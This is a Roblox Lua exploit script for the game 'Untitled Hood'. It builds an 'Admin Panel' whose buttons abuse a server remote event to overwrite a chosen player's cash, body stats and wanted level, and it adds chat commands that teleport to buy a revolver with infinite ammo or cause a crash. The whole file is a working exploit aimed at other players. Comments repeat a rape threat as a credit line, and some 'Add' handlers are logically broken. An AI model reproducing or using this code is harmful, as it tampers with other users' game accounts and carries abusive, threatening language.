-- credits to bru#6621, if not ill rape u so hard

local lp = game:FindService("Players").LocalPlayer

local function gplr(String)
	local Found = {}
	local strl = String:lower()
	if strl == "all" then
		for i,v in pairs(game:FindService("Players"):GetPlayers()) do
			table.insert(Found,v)
		end
	elseif strl == "others" then
		for i,v in pairs(game:FindService("Players"):GetPlayers()) do
			if v.Name ~= lp.Name then
				table.insert(Found,v)
			end
		end 
	elseif strl == "me" then
		for i,v in pairs(game:FindService("Players"):GetPlayers()) do
			if v.Name == lp.Name then
				table.insert(Found,v)
			end
		end 
	else
		for i,v in pairs(game:FindService("Players"):GetPlayers()) do
			if v.Name:lower():sub(1, #String) == String:lower() then
				table.insert(Found,v)
			end
		end 
	end
	return Found 
end

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local named = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local UIGradient = Instance.new("UIGradient")
local targetcash = Instance.new("Frame")
local TextBox = Instance.new("TextBox")
local cash = Instance.new("TextLabel")
local cash_2 = Instance.new("TextButton")
local cash_3 = Instance.new("TextButton")
local cash_4 = Instance.new("TextButton")
local cash_5 = Instance.new("TextButton")
local cash_6 = Instance.new("TextButton")
local cash_7 = Instance.new("TextButton")
local cash_8 = Instance.new("TextButton")
local cash_9 = Instance.new("TextButton")
local cash_10 = Instance.new("TextButton")
local targetcash_2 = Instance.new("Frame")
local size = Instance.new("TextLabel")
local size_2 = Instance.new("TextButton")
local size_3 = Instance.new("TextButton")
local size_4 = Instance.new("TextButton")
local targetcash_3 = Instance.new("Frame")
local wanted = Instance.new("TextLabel")
local wanted_2 = Instance.new("TextButton")
local wanted_3 = Instance.new("TextButton")
local wanted_4 = Instance.new("TextButton")
local size_5 = Instance.new("TextButton")

-- main

ScreenGui.Parent = game.CoreGui

Frame.Parent = ScreenGui
Frame.Active = true
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 0)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.109523818, 0, 0.215434074, 0)
Frame.Size = UDim2.new(0, 342, 0, 404)
Frame.Draggable = true

named.Name = "named"
named.Parent = Frame
named.Active = true
named.BackgroundColor3 = Color3.fromRGB(255, 255, 0)
named.BorderSizePixel = 0
named.Position = UDim2.new(0, 0, -0.000988642336, 0)
named.Size = UDim2.new(0, 342, 0, 33)

TextLabel.Parent = named
TextLabel.Active = true
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Size = UDim2.new(0, 342, 0, 33)
TextLabel.Font = Enum.Font.JosefinSans
TextLabel.Text = "Untitled Hood | Admin Panel"
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 14.000

UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(125, 125, 125)), ColorSequenceKeypoint.new(0.38, Color3.fromRGB(161, 161, 161)), ColorSequenceKeypoint.new(0.97, Color3.fromRGB(198, 198, 7)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(147, 147, 0))}
UIGradient.Parent = Frame

targetcash.Name = "target | cash"
targetcash.Parent = Frame
targetcash.Active = true
targetcash.BackgroundColor3 = Color3.fromRGB(255, 255, 0)
targetcash.BorderSizePixel = 0
targetcash.Position = UDim2.new(0, 0, 0.185366258, 0)
targetcash.Size = UDim2.new(0, 342, 0, 10)

TextBox.Name = "target"
TextBox.Parent = Frame
TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextBox.BackgroundTransparency = 1.000
TextBox.Position = UDim2.new(0, 0, 0.104780592, 0)
TextBox.Size = UDim2.new(0, 342, 0, 25)
TextBox.Font = Enum.Font.JosefinSans
TextBox.PlaceholderColor3 = Color3.fromRGB(0, 0, 0)
TextBox.PlaceholderText = "TARGET"
TextBox.Text = ""
TextBox.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextSize = 14.000
TextBox.TextWrapped = true

cash.Name = "cash"
cash.Parent = Frame
cash.Active = true
cash.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cash.BackgroundTransparency = 1.000
cash.Position = UDim2.new(0, 0, 0.20792079, 0)
cash.Size = UDim2.new(0, 342, 0, 33)
cash.Font = Enum.Font.JosefinSans
cash.Text = "CASH UTILITIES"
cash.TextColor3 = Color3.fromRGB(0, 0, 0)
cash.TextSize = 14.000

cash_2.Name = "cash"
cash_2.Parent = Frame
cash_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cash_2.BackgroundTransparency = 1.000
cash_2.Position = UDim2.new(0.0497076027, 0, 0.289603978, 0)
cash_2.Size = UDim2.new(0, 85, 0, 23)
cash_2.Font = Enum.Font.JosefinSans
cash_2.Text = "Negative"
cash_2.TextColor3 = Color3.fromRGB(0, 0, 0)
cash_2.TextSize = 14.000
cash_2.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]

		
game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
			"Reload",
			{
				Name = "[Revolver]",
				Ammo = game.Players['' ..tostring(Target)].DataFolder.Currency,
				MaxAmmo = {Value = math.huge}
			}
			)

end
	end)

cash_3.Name = "cash"
cash_3.Parent = Frame
cash_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cash_3.BackgroundTransparency = 1.000
cash_3.Position = UDim2.new(0.695906401, 0, 0.289603978, 0)
cash_3.Size = UDim2.new(0, 85, 0, 23)
cash_3.Font = Enum.Font.JosefinSans
cash_3.Text = "UnNegative"
cash_3.TextColor3 = Color3.fromRGB(0, 0, 0)
cash_3.TextSize = 14.000
cash_3.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]


game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
				"Reload",
				{
					Name = "[Revolver]",
					Ammo = game.Players['' ..tostring(Target)].DataFolder.Currency,
					MaxAmmo = {Value = 999999999999999999 * 9}
				}
				)
end
	end)

cash_4.Name = "cash"
cash_4.Parent = Frame
cash_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cash_4.BackgroundTransparency = 1.000
cash_4.Position = UDim2.new(0.374268979, 0, 0.289603978, 0)
cash_4.Size = UDim2.new(0, 85, 0, 23)
cash_4.Font = Enum.Font.JosefinSans
cash_4.Text = "Neutral"
cash_4.TextColor3 = Color3.fromRGB(0, 0, 0)
cash_4.TextSize = 14.000
cash_4.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]


game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
				"Reload",
				{
					Name = "[Revolver]",
					Ammo = game.Players['' ..tostring(Target)].DataFolder.Currency,
					MaxAmmo = {Value = 0}
				}
				)
end
	end)

cash_5.Name = "cash"
cash_5.Parent = Frame
cash_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cash_5.BackgroundTransparency = 1.000
cash_5.Position = UDim2.new(0.0526315272, 0, 0.351485163, 0)
cash_5.Size = UDim2.new(0, 85, 0, 23)
cash_5.Font = Enum.Font.JosefinSans
cash_5.Text = "Set 10.000"
cash_5.TextColor3 = Color3.fromRGB(0, 0, 0)
cash_5.TextSize = 14.000
cash_5.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]


		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game.Players['' ..tostring(Target)].DataFolder.Currency,
			MaxAmmo = {Value = 10000}
		}
		)
end
	end)

cash_6.Name = "cash"
cash_6.Parent = Frame
cash_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cash_6.BackgroundTransparency = 1.000
cash_6.Position = UDim2.new(0.695906401, 0, 0.351485163, 0)
cash_6.Size = UDim2.new(0, 85, 0, 23)
cash_6.Font = Enum.Font.JosefinSans
cash_6.Text = "Set 10.000.000"
cash_6.TextColor3 = Color3.fromRGB(0, 0, 0)
cash_6.TextScaled = true
cash_6.TextSize = 14.000
cash_6.TextWrapped = true
cash_6.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]


		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game.Players['' ..tostring(Target)].DataFolder.Currency,
			MaxAmmo = {Value = 10000000}
		}
		)
end
	end)

cash_7.Name = "cash"
cash_7.Parent = Frame
cash_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cash_7.BackgroundTransparency = 1.000
cash_7.Position = UDim2.new(0.374268979, 0, 0.351485163, 0)
cash_7.Size = UDim2.new(0, 85, 0, 23)
cash_7.Font = Enum.Font.JosefinSans
cash_7.Text = "Set 500.000"
cash_7.TextColor3 = Color3.fromRGB(0, 0, 0)
cash_7.TextScaled = true
cash_7.TextSize = 14.000
cash_7.TextWrapped = true
cash_7.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]


		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game.Players['' ..tostring(Target)].DataFolder.Currency,
			MaxAmmo = {Value = 500000}
		}
		)
end
	end)

cash_8.Name = "cash"
cash_8.Parent = Frame
cash_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cash_8.BackgroundTransparency = 1.000
cash_8.Position = UDim2.new(0.0526315272, 0, 0.408415854, 0)
cash_8.Size = UDim2.new(0, 85, 0, 23)
cash_8.Font = Enum.Font.JosefinSans
cash_8.Text = "Add 10.000"
cash_8.TextColor3 = Color3.fromRGB(0, 0, 0)
cash_8.TextSize = 14.000
cash_8.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]


		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game.Players['' ..tostring(Target)].DataFolder.Currency,
			MaxAmmo = {Value = game.Players['' ..tostring(Target)].DataFolder.Currency == game.Players['' ..tostring(Target)].DataFolder.Currency + 10000}
		}
		)
end
	end)

cash_9.Name = "cash"
cash_9.Parent = Frame
cash_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cash_9.BackgroundTransparency = 1.000
cash_9.Position = UDim2.new(0.374268979, 0, 0.408415854, 0)
cash_9.Size = UDim2.new(0, 85, 0, 23)
cash_9.Font = Enum.Font.JosefinSans
cash_9.Text = "Add 500.000"
cash_9.TextColor3 = Color3.fromRGB(0, 0, 0)
cash_9.TextScaled = true
cash_9.TextSize = 14.000
cash_9.TextWrapped = true
cash_9.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]


		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game.Players['' ..tostring(Target)].DataFolder.Currency,
			MaxAmmo = {Value = game.Players['' ..tostring(Target)].DataFolder.Currency == game.Players['' ..tostring(Target)].DataFolder.Currency + 500000}
		}
		)
end
	end)

cash_10.Name = "cash"
cash_10.Parent = Frame
cash_10.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cash_10.BackgroundTransparency = 1.000
cash_10.Position = UDim2.new(0.695906401, 0, 0.408415854, 0)
cash_10.Size = UDim2.new(0, 85, 0, 23)
cash_10.Font = Enum.Font.JosefinSans
cash_10.Text = "Add 10.000.000"
cash_10.TextColor3 = Color3.fromRGB(0, 0, 0)
cash_10.TextScaled = true
cash_10.TextSize = 14.000
cash_10.TextWrapped = true
cash_10.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]

game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game.Players['' ..tostring(Target)].DataFolder.Currency,
			MaxAmmo = {Value = targetcash == targetcash + 10000000}
		}
		)
end
	end)

targetcash_2.Name = "target | cash"
targetcash_2.Parent = Frame
targetcash_2.Active = true
targetcash_2.BackgroundColor3 = Color3.fromRGB(255, 255, 0)
targetcash_2.BorderSizePixel = 0
targetcash_2.Position = UDim2.new(-0.00292397663, 0, 0.465069205, 0)
targetcash_2.Size = UDim2.new(0, 342, 0, 10)

size.Name = "size"
size.Parent = Frame
size.Active = true
size.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
size.BackgroundTransparency = 1.000
size.Position = UDim2.new(0, 0, 0.487623781, 0)
size.Size = UDim2.new(0, 342, 0, 33)
size.Font = Enum.Font.JosefinSans
size.Text = "BODY UTILITES"
size.TextColor3 = Color3.fromRGB(0, 0, 0)
size.TextSize = 14.000

size_2.Name = "size"
size_2.Parent = Frame
size_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
size_2.BackgroundTransparency = 1.000
size_2.Position = UDim2.new(0.0497076027, 0, 0.56930691, 0)
size_2.Size = UDim2.new(0, 68, 0, 23)
size_2.Font = Enum.Font.JosefinSans
size_2.Text = "Really Skinny"
size_2.TextColor3 = Color3.fromRGB(0, 0, 0)
size_2.TextSize = 14.000
size_2.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]

		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game:GetService("Players")['' ..tostring(Target)].DataFolder.Information.MuscleInformation,
			MaxAmmo = {Value = -99999}
		}
		)
end
	end)

size_3.Name = "size"
size_3.Parent = Frame
size_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
size_3.BackgroundTransparency = 1.000
size_3.Position = UDim2.new(0.298245609, 0, 0.56930691, 0)
size_3.Size = UDim2.new(0, 85, 0, 23)
size_3.Font = Enum.Font.JosefinSans
size_3.Text = "Skinny"
size_3.TextColor3 = Color3.fromRGB(0, 0, 0)
size_3.TextSize = 14.000
size_3.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]

		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game:GetService("Players")['' ..tostring(Target)].DataFolder.Information.MuscleInformation,
			MaxAmmo = {Value = -15000}
		}
		)
end
	end)

size_4.Name = "size"
size_4.Parent = Frame
size_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
size_4.BackgroundTransparency = 1.000
size_4.Position = UDim2.new(0.751461983, 0, 0.56930691, 0)
size_4.Size = UDim2.new(0, 85, 0, 23)
size_4.Font = Enum.Font.JosefinSans
size_4.Text = "Huge"
size_4.TextColor3 = Color3.fromRGB(0, 0, 0)
size_4.TextSize = 14.000
size_4.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]

		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game:GetService("Players")['' ..tostring(Target)].DataFolder.Information.MuscleInformation,
			MaxAmmo = {Value = 88888}
		}
		)
end
	end)

targetcash_3.Name = "target | cash"
targetcash_3.Parent = Frame
targetcash_3.Active = true
targetcash_3.BackgroundColor3 = Color3.fromRGB(255, 255, 0)
targetcash_3.BorderSizePixel = 0
targetcash_3.Position = UDim2.new(0, 0, 0.62596029, 0)
targetcash_3.Size = UDim2.new(0, 342, 0, 10)

wanted.Name = "wanted"
wanted.Parent = Frame
wanted.Active = true
wanted.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
wanted.BackgroundTransparency = 1.000
wanted.Position = UDim2.new(-0.00292397663, 0, 0.648514867, 0)
wanted.Size = UDim2.new(0, 342, 0, 33)
wanted.Font = Enum.Font.JosefinSans
wanted.Text = "WANTED UTILITES"
wanted.TextColor3 = Color3.fromRGB(0, 0, 0)
wanted.TextSize = 14.000

wanted_2.Name = "wanted"
wanted_2.Parent = Frame
wanted_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
wanted_2.BackgroundTransparency = 1.000
wanted_2.Position = UDim2.new(0.0497076027, 0, 0.730198026, 0)
wanted_2.Size = UDim2.new(0, 85, 0, 23)
wanted_2.Font = Enum.Font.JosefinSans
wanted_2.Text = "Negative"
wanted_2.TextColor3 = Color3.fromRGB(0, 0, 0)
wanted_2.TextSize = 14.000
wanted_2.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]

		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game:GetService("Players")['' ..tostring(Target)].leaderstats.Wanted,
			MaxAmmo = {Value = math.huge}
		}
		)   
end
	end)

wanted_3.Name = "wanted"
wanted_3.Parent = Frame
wanted_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
wanted_3.BackgroundTransparency = 1.000
wanted_3.Position = UDim2.new(0.374268979, 0, 0.730198026, 0)
wanted_3.Size = UDim2.new(0, 85, 0, 23)
wanted_3.Font = Enum.Font.JosefinSans
wanted_3.Text = "Neutral"
wanted_3.TextColor3 = Color3.fromRGB(0, 0, 0)
wanted_3.TextSize = 14.000
wanted_3.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]

		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game:GetService("Players")['' ..tostring(Target)].leaderstats.Wanted,
			MaxAmmo = {Value = 0}
		}
		)   
end
	end)

wanted_4.Name = "wanted"
wanted_4.Parent = Frame
wanted_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
wanted_4.BackgroundTransparency = 1.000
wanted_4.Position = UDim2.new(0.695906401, 0, 0.730198026, 0)
wanted_4.Size = UDim2.new(0, 85, 0, 23)
wanted_4.Font = Enum.Font.JosefinSans
wanted_4.Text = "UnNegotive"
wanted_4.TextColor3 = Color3.fromRGB(0, 0, 0)
wanted_4.TextSize = 14.000
-- credits to bru#6621, if not ill rape u so hard
wanted_4.MouseButton1Down:Connect(function()
		local Target = gplr(TextBox.Text)
		if Target[1] then
			Target = Target[1]



			game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
			"Reload",
			{
				Name = "[Revolver]",
				Ammo = game:GetService("Players")['' ..tostring(Target)].leaderstats.Wanted,
			MaxAmmo = {Value = 999999999999999999 * 9}
			}
			)   
end
		end)

size_5.Name = "size"
size_5.Parent = Frame
size_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
size_5.BackgroundTransparency = 1.000
size_5.Position = UDim2.new(0.546783626, 0, 0.56930691, 0)
size_5.Size = UDim2.new(0, 70, 0, 23)
size_5.Font = Enum.Font.JosefinSans
size_5.Text = "Neutral"
size_5.TextColor3 = Color3.fromRGB(0, 0, 0)
size_5.TextSize = 14.000
size_5.MouseButton1Down:Connect(function()
	local Target = gplr(TextBox.Text)
	if Target[1] then
		Target = Target[1]

		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game:GetService("Players")['' ..tostring(Target)].DataFolder.Information.MuscleInformation,
			MaxAmmo = {Value = 0}
		}
		)
end
	end)

--//
	-- [==[ Generated by mothra#1337 ]==]
-- (Anti-Displayname v3)
-- 6/17/21
if not game['Loaded'] or not game:GetService('Players')['LocalPlayer'] then
    game['Loaded']:Wait();
    if game['PlaceId'] == '292439477' then return end -- (Phantom Forces).. maybe reduces lag, prevents bans etc
    game:WaitForChild(game:GetService('Players'));
    game:GetService('Players'):WaitForChild(game:GetService('Players').LocalPlayer.Name)
end

local Players = game:GetService('Players')
local AppendName = function(plr)
    if plr:IsA('Player') and not (plr['Character'] and plr.Character ~= nil) then
        plr.CharacterAdded:wait()
        local HeadFound, HumFound = false, false
        local ChildAdded;ChildAdded = plr.Character.ChildAdded:Connect(function(v)
            if HeadFound and HumFound then ChildAdded:Disconnect() return end
            if v:IsA('BasePart') or v:IsA('MeshPart') and v.Name == 'Head' then
                if HeadFound then return end
                HeadFound = true
                if v:IsA('MeshPart') and v.MeshId == 'rbxassetid://6686307858' then
                    local FakeName = Instance.new('BillboardGui')
                    local Name = Instance.new('TextLabel')
                    
                    FakeName.Name = 'FakeName'
                    FakeName.Parent = v
                    FakeName.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
                    FakeName.Active = true
                    FakeName.AlwaysOnTop = false
                    FakeName.LightInfluence = 1.000
                    FakeName.MaxDistance = 100.000
                    FakeName.Size = UDim2.new(1, 0, 3, 0)
                    FakeName.StudsOffset = Vector3.new(0, 1.7999999523163, 0)
                    FakeName.Adornee = v
                    
                    Name.Name = 'Name'
                    Name.Parent = FakeName
                    Name.Active = true
                    Name.AnchorPoint = Vector2.new(0.5, 0.5)
                    Name.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
                    Name.BackgroundTransparency = 1.000
                    Name.BorderSizePixel = 0
                    Name.Position = UDim2.new(0.5, 0, 0.5, 0)
                    Name.Size = UDim2.new(1, 30, 1, 0)
                    Name.Font = Enum.Font.SourceSans
                    Name.Text = plr.DisplayName..'\n['..tostring(plr.Name)..']'
                    Name.TextColor3 = Color3.fromRGB(255, 255, 255)
                    Name.TextScaled = true
                    Name.TextSize = 24.000
                    Name.TextStrokeTransparency = 0.600
                    Name.TextWrapped = true
                end
            elseif v:IsA('Humanoid') then
                if HumFound then return end
                HumFound = true
                if v.DisplayName ~= plr.Name and not v.DisplayName:gsub(' ', ''):find(plr.Name:gsub(' ', '')) then
                    v.DisplayName = plr.DisplayName..'\n[@'..tostring(plr.Name)..']'
                end
            end
        end)
    elseif plr:IsA('Player') and (plr['Character'] and plr.Character ~= nil) and plr.Character:FindFirstChildOfClass('Humanoid') and plr.Character:FindFirstChild('Head') then
        local Char = plr.Character

        for _, v in next, Char:GetChildren() do
            coroutine.wrap(function()
                if v.Name == 'Head' and v:IsA('MeshPart') and v.MeshId == 'rbxassetid://6686307858' then
                    local FakeName = Instance.new('BillboardGui')
                    local Name = Instance.new('TextLabel')
                    
                    FakeName.Name = 'FakeName'
                    FakeName.Parent = v
                    FakeName.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
                    FakeName.Active = true
                    FakeName.AlwaysOnTop = false
                    FakeName.LightInfluence = 1.000
                    FakeName.MaxDistance = 100.000
                    FakeName.Size = UDim2.new(1, 0, 3, 0)
                    FakeName.StudsOffset = Vector3.new(0, 1.7999999523163, 0)
                    FakeName.Adornee = v
                    
                    Name.Name = 'Name'
                    Name.Parent = FakeName
                    Name.Active = true
                    Name.AnchorPoint = Vector2.new(0.5, 0.5)
                    Name.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
                    Name.BackgroundTransparency = 1.000
                    Name.BorderSizePixel = 0
                    Name.Position = UDim2.new(0.5, 0, 0.5, 0)
                    Name.Size = UDim2.new(1, 30, 1, 0)
                    Name.Font = Enum.Font.SourceSans
                    Name.Text = plr.DisplayName..'\n['..tostring(plr.Name)..']'
                    Name.TextColor3 = Color3.fromRGB(255, 255, 255)
                    Name.TextScaled = true
                    Name.TextSize = 24.000
                    Name.TextStrokeTransparency = 0.600
                    Name.TextWrapped = true
                elseif v:IsA('Humanoid') and v.DisplayName ~= plr.Name and not v.DisplayName:gsub(' ', ''):find(plr.Name:gsub(' ', '')) then
                    v.DisplayName = plr.DisplayName..'\n[@'..tostring(plr.Name)..']'
                end
            end)()
        end
    end
    plr.CharacterAdded:Connect(function()
        local HeadFound, HumFound = false, false
        local ChildAdded;ChildAdded = plr.Character.ChildAdded:Connect(function(v)
            if HeadFound and HumFound then ChildAdded:Disconnect() return end
            if v:IsA('BasePart') or v:IsA('MeshPart') and v.Name == 'Head' then
                if HeadFound then return end
                HeadFound = true
                if v:IsA('MeshPart') and v.MeshId == 'rbxassetid://6686307858' then
                    local FakeName = Instance.new('BillboardGui')
                    local Name = Instance.new('TextLabel')
                    
                    FakeName.Name = 'FakeName'
                    FakeName.Parent = v
                    FakeName.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
                    FakeName.Active = true
                    FakeName.AlwaysOnTop = false
                    FakeName.LightInfluence = 1.000
                    FakeName.MaxDistance = 100.000
                    FakeName.Size = UDim2.new(1, 0, 3, 0)
                    FakeName.StudsOffset = Vector3.new(0, 1.7999999523163, 0)
                    FakeName.Adornee = v
                    
                    Name.Name = 'Name'
                    Name.Parent = FakeName
                    Name.Active = true
                    Name.AnchorPoint = Vector2.new(0.5, 0.5)
                    Name.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
                    Name.BackgroundTransparency = 1.000
                    Name.BorderSizePixel = 0
                    Name.Position = UDim2.new(0.5, 0, 0.5, 0)
                    Name.Size = UDim2.new(1, 30, 1, 0)
                    --credits to bru#6621, if not ill rape u so hard
                    Name.Font = Enum.Font.SourceSans
                    Name.Text = plr.DisplayName..'\n['..tostring(plr.Name)..']'
                    Name.TextColor3 = Color3.fromRGB(255, 255, 255)
                    Name.TextScaled = true
                    Name.TextSize = 24.000
                    Name.TextStrokeTransparency = 0.600
                    Name.TextWrapped = true
                end
            elseif v:IsA('Humanoid') then
                if HumFound then return end
                HumFound = true
                if v.DisplayName ~= plr.Name and not v.DisplayName:gsub(' ', ''):find(plr.Name:gsub(' ', '')) then
                    v.DisplayName = plr.DisplayName..'\n[@'..tostring(plr.Name)..']'
                end
            end
        end)
    end)
end

for _, plr in next, Players:GetPlayers() do
    if plr ~= game:GetService('Players').LocalPlayer then
        coroutine.wrap(function()
            AppendName(plr)
        end)()
    end
end

--// buy rev

game.Players.LocalPlayer.Chatted:Connect(function(m)
if m == ".rev" then
local revolver = game:GetService("Workspace").Ignored.Shop["[Revolver] - $1300"].Head
local clickdetector = game:GetService("Workspace").Ignored.Shop["[Revolver] - $1300"].ClickDetector
local lp = game.Players.LocalPlayer
-- credits to bru#6621, if not ill rape u so hard
local sp = game.Players.LocalPlayer.Character.HumanoidRootPart.Position
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = revolver.CFrame
wait(0.2)
fireclickdetector(clickdetector)
wait(0.3)
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(sp)
task.wait(0.5)
game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
    "Reload",
    {
        Name = "[Revolver]", 
        Ammo = {Value = math.huge*9e9},
        MaxAmmo = {Value = 0}
    }
)
elseif m == ".crash" then
		game.ReplicatedStorage:FindFirstChild(".gg/untitledhood"):FireServer(
		"Reload",
		{
			Name = "[Revolver]",
			Ammo = game.Players.LocalPlayer.DataFolder.Information.MuscleInformation,
			MaxAmmo = {Value = 9999999999999999999 * 9}
		}
		)
wait(2)
game.Players.LocalPlayer.Character.Head:Destroy() -- credits to bru#6621, if not ill rape u so hard
-- credits to bru#6621, if not ill rape u so hard
end
end)
